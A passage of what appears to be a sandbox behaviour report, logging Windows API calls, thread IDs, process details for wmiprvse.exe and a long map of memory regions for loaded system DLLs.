(hMem=0x0) returned 0x0 [0226.460] LocalFree (hMem=0x0) returned 0x0 [0226.460] DisableThreadLibraryCalls (hLibModule=0x7fffa4080000) returned 1 [0226.464] getenv (_VarName="CERTSRV_DEBUG") returned 0x0 [0226.464] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", lpValue="Debug", dwFlags=0x10, pdwType=0x0, pvData=0x257a53c, pcbData=0x257a504*=0x4 | out: pdwType=0x0, pvData=0x257a53c, pcbData=0x257a504*=0x4) returned 0x2 [0226.464] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration", lpValue="Debug", dwFlags=0x10, pdwType=0x0, pvData=0x257a538, pcbData=0x257a504*=0x4 | out: pdwType=0x0, pvData=0x257a538, pcbData=0x257a504*=0x4) returned 0x2 [0226.464] LocalAlloc (uFlags=0x40, uBytes=0x70) returned 0x60c8310 [0226.464] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration", ulOptions=0x0, samDesired=0x20019, phkResult=0x257a550 | out: phkResult=0x257a550*=0x0) returned 0x2 [0226.465] LocalFree (hMem=0x60c8310) returned 0x0 [0226.465] GetLocalTime (in: lpSystemTime=0x2579838 | out: lpSystemTime=0x2579838*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x37, wSecond=0x28, wMilliseconds=0x291)) [0226.465] _vsnprintf (in: _DstBuf=0x2579848, _MaxCount=0xf, _Format="File%u", _ArgList=0x25797c8 | out: _DstBuf="File437") returned 7 [0226.465] GetACP () returned 0x4e4 [0226.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="certenroll.log", cbMultiByte=-1, lpWideCharStr=0x257a5f0, cchWideChar=64 | out: lpWideCharStr="certenroll.log") returned 15 [0226.465] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", lpValue="certenroll.log", dwFlags=0x10, pdwType=0x0, pvData=0x257a518, pcbData=0x257a504*=0x4 | out: pdwType=0x0, pvData=0x257a518, pcbData=0x257a504*=0x4) returned 0x2 Thread: id = 169 os_tid = 0x728 Thread: id = 170 os_tid = 0x6e0 Thread: id = 171 os_tid = 0x54c Thread: id = 172 os_tid = 0x4f0 Thread: id = 173 os_tid = 0x450 Thread: id = 174 os_tid = 0x448 Thread: id = 175 os_tid = 0x430 Thread: id = 176 os_tid = 0x420 Thread: id = 177 os_tid = 0x170 Thread: id = 178 os_tid = 0x3ec Thread: id = 179 os_tid = 0x33c Thread: id = 180 os_tid = 0x214 Thread: id = 181 os_tid = 0x188 Thread: id = 201 os_tid = 0x758 Thread: id = 205 os_tid = 0x880 Thread: id = 212 os_tid = 0x13c4 Thread: id = 250 os_tid = 0x1290 Thread: id = 251 os_tid = 0x8d4 Thread: id = 252 os_tid = 0x34c Thread: id = 265 os_tid = 0xd84 Thread: id = 266 os_tid = 0x5d0 Thread: id = 267 os_tid = 0x148c Thread: id = 330 os_tid = 0x11bc Thread: id = 344 os_tid = 0xc60 Thread: id = 345 os_tid = 0x1478 Thread: id = 346 os_tid = 0x1630 Thread: id = 373 os_tid = 0xdfc Thread: id = 374 os_tid = 0x1740 Thread: id = 383 os_tid = 0x1770 Thread: id = 384 os_tid = 0x1198 Thread: id = 385 os_tid = 0x1720 Process: id = "6" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x5ef51000" os_pid = "0xf20" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e990" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x310" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "S-1-5-80-2949785411-1458004381-4011503523-1439849274-3428788682" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "S-1-5-80-1139522462-2689595747-457373284-4037083511-4201549542" [0xa], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xe], "S-1-5-80-3577588319-513283748-931039988-2701962192-2148388740" [0xa], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bdae" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2053 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2054 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2055 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2056 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2057 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2058 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2059 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2060 start_va = 0x100000 end_va = 0x1c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2061 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2062 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2063 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2064 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2065 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2066 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 2067 start_va = 0x490000 end_va = 0x497fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 2068 start_va = 0x4a0000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 2069 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2070 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2071 start_va = 0x590000 end_va = 0x594fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2072 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 2073 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2074 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2075 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2076 start_va = 0x6d0000 end_va = 0x850fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 2077 start_va = 0x860000 end_va = 0x860fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 2078 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 2079 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 2080 start_va = 0x890000 end_va = 0xbc7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2081 start_va = 0xbd0000 end_va = 0xdcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 2082 start_va = 0xdd0000 end_va = 0xe4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 2083 start_va = 0xe50000 end_va = 0xf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 2084 start_va = 0xf50000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 2085 start_va = 0xfd0000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 2086 start_va = 0x1050000 end_va = 0x1059fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "combase.dll.mui" filename = "\\Windows\\System32\\en-US\\combase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\combase.dll.mui") Region: id = 2087 start_va = 0x10d0000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 2088 start_va = 0x1150000 end_va = 0x1151fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mofd.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\mofd.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\mofd.dll.mui") Region: id = 2089 start_va = 0x1250000 end_va = 0x1251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Region: id = 2090 start_va = 0x1270000 end_va = 0x136ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 2091 start_va = 0x13c0000 end_va = 0x13cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 2092 start_va = 0x13d0000 end_va = 0x144ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 2093 start_va = 0x1450000 end_va = 0x158efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2094 start_va = 0x17b0000 end_va = 0x19affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 2095 start_va = 0x19b0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019b0000" filename = "" Region: id = 2096 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2097 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 2098 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 2099 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 2100 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 2101 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 2102 start_va = 0x7ff708950000 end_va = 0x7ff7089cdfff monitored = 0 entry_point = 0x7ff708962580 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 2103 start_va = 0x7fff997e0000 end_va = 0x7fff99806fff monitored = 1 entry_point = 0x7fff997f6b00 region_type = mapped_file name = "wmiperfclass.dll" filename = "\\Windows\\System32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll") Region: id = 2104 start_va = 0x7fffac9c0000 end_va = 0x7fffaca75fff monitored = 0 entry_point = 0x7fffaca34980 region_type = mapped_file name = "devinv.dll" filename = "\\Windows\\System32\\devinv.dll" (normalized: "c:\\windows\\system32\\devinv.dll") Region: id = 2105 start_va = 0x7fffaca80000 end_va = 0x7fffacb41fff monitored = 0 entry_point = 0x7fffaca86710 region_type = mapped_file name = "aeinv.dll" filename = "\\Windows\\System32\\aeinv.dll" (normalized: "c:\\windows\\system32\\aeinv.dll") Region: id = 2106 start_va = 0x7fffacb50000 end_va = 0x7fffacbd3fff monitored = 1 entry_point = 0x7fffacba09d0 region_type = mapped_file name = "invagent.dll" filename = "\\Windows\\System32\\invagent.dll" (normalized: "c:\\windows\\system32\\invagent.dll") Region: id = 2107 start_va = 0x7fffadb70000 end_va = 0x7fffade9afff monitored = 0 entry_point = 0x7fffadcb4ed0 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 2108 start_va = 0x7fffb2f50000 end_va = 0x7fffb2f94fff monitored = 0 entry_point = 0x7fffb2f79e70 region_type = mapped_file name = "mofd.dll" filename = "\\Windows\\System32\\wbem\\mofd.dll" (normalized: "c:\\windows\\system32\\wbem\\mofd.dll") Region: id = 2109 start_va = 0x7fffb2fa0000 end_va = 0x7fffb2fdbfff monitored = 1 entry_point = 0x7fffb2fa9d70 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Region: id = 2110 start_va = 0x7fffb4300000 end_va = 0x7fffb4317fff monitored = 0 entry_point = 0x7fffb4305be0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2111 start_va = 0x7fffb4750000 end_va = 0x7fffb4777fff monitored = 0 entry_point = 0x7fffb4759440 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2112 start_va = 0x7fffb4780000 end_va = 0x7fffb4793fff monitored = 0 entry_point = 0x7fffb4781800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2113 start_va = 0x7fffb47a0000 end_va = 0x7fffb481cfff monitored = 0 entry_point = 0x7fffb47b5a80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 2114 start_va = 0x7fffb4820000 end_va = 0x7fffb492afff monitored = 0 entry_point = 0x7fffb4855c10 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2115 start_va = 0x7fffb4d40000 end_va = 0x7fffb4d50fff monitored = 0 entry_point = 0x7fffb4d42aa0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2116 start_va = 0x7fffb4ef0000 end_va = 0x7fffb502bfff monitored = 0 entry_point = 0x7fffb4efadf0 region_type = mapped_file name = "drvstore.dll" filename = "\\Windows\\System32\\drvstore.dll" (normalized: "c:\\windows\\system32\\drvstore.dll") Region: id = 2117 start_va = 0x7fffb6380000 end_va = 0x7fffb63c8fff monitored = 0 entry_point = 0x7fffb6383550 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 2118 start_va = 0x7fffb7ee0000 end_va = 0x7fffb7f6afff monitored = 0 entry_point = 0x7fffb7ef7060 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 2119 start_va = 0x7fffb8a70000 end_va = 0x7fffb8a7afff monitored = 0 entry_point = 0x7fffb8a73070 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 2120 start_va = 0x7fffbceb0000 end_va = 0x7fffbcf92fff monitored = 0 entry_point = 0x7fffbcec49e0 region_type = mapped_file name = "windows.applicationmodel.dll" filename = "\\Windows\\System32\\Windows.ApplicationModel.dll" (normalized: "c:\\windows\\system32\\windows.applicationmodel.dll") Region: id = 2121 start_va = 0x7fffbe330000 end_va = 0x7fffbe3b5fff monitored = 1 entry_point = 0x7fffbe345570 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2122 start_va = 0x7fffbfed0000 end_va = 0x7fffbffd1fff monitored = 0 entry_point = 0x7fffbff157d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2123 start_va = 0x7fffc3780000 end_va = 0x7fffc37e4fff monitored = 0 entry_point = 0x7fffc3793640 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2124 start_va = 0x7fffc3fc0000 end_va = 0x7fffc40b7fff monitored = 0 entry_point = 0x7fffc3fd73e0 region_type = mapped_file name = "appxdeploymentclient.dll" filename = "\\Windows\\System32\\AppXDeploymentClient.dll" (normalized: "c:\\windows\\system32\\appxdeploymentclient.dll") Region: id = 2125 start_va = 0x7fffc48e0000 end_va = 0x7fffc48f0fff monitored = 0 entry_point = 0x7fffc48e3670 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2126 start_va = 0x7fffc56c0000 end_va = 0x7fffc58c1fff monitored = 0 entry_point = 0x7fffc572d800 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 2127 start_va = 0x7fffc5ea0000 end_va = 0x7fffc5ed5fff monitored = 0 entry_point = 0x7fffc5eaf5a0 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2128 start_va = 0x7fffc7e30000 end_va = 0x7fffc7f08fff monitored = 0 entry_point = 0x7fffc7e87a70 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 2129 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2130 start_va = 0x7fffc9000000 end_va = 0x7fffc9032fff monitored = 0 entry_point = 0x7fffc9006930 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2131 start_va = 0x7fffc9590000 end_va = 0x7fffc95cafff monitored = 0 entry_point = 0x7fffc959a620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2132 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2133 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2134 start_va = 0x7fffc9ec0000 end_va = 0x7fffc9eebfff monitored = 0 entry_point = 0x7fffc9ec7370 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2135 start_va = 0x7fffca220000 end_va = 0x7fffca26cfff monitored = 0 entry_point = 0x7fffca233280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2136 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2137 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 2138 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2139 start_va = 0x7fffca500000 end_va = 0x7fffca55ffff monitored = 0 entry_point = 0x7fffca510380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2140 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 2141 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2142 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 2143 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2144 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2145 start_va = 0x7fffcad60000 end_va = 0x7fffcad7cfff monitored = 0 entry_point = 0x7fffcad623b0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 2146 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2147 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2148 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2149 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2150 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2151 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2152 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2153 start_va = 0x7fffcb970000 end_va = 0x7fffcb9c4fff monitored = 0 entry_point = 0x7fffcb97a7e0 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2154 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2155 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2156 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2157 start_va = 0x7fffcc020000 end_va = 0x7fffcc08afff monitored = 0 entry_point = 0x7fffcc034300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2158 start_va = 0x7fffcc090000 end_va = 0x7fffcc7c0fff monitored = 0 entry_point = 0x7fffcc19e6e0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2159 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2160 start_va = 0x7fffcc960000 